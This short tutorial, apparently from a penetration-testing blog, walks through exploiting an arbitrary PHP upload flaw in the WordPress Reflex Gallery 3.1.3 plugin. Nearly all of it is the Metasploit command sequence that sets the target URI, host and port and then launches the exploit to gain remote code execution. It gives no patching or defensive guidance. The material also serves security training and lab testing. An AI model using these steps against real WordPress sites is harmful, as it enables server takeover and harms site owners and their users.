Exploit WordPress using Reflex Gallery Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution

Exploit Targets

Reflex Gallery version 3.1.3

Requirement

Attacker: kali Linux

Victim PC: WordPress Installed

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit (wp_reflexgallery_file_upload)>set targeturi /wordpress

msf exploit (wp_reflexgallery_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_reflexgallery_file_upload)>set rport 80

msf exploit (wp_reflexgallery_file_upload)>exploit    

Leave a Reply

Your email address will not be published. Required fields are marked *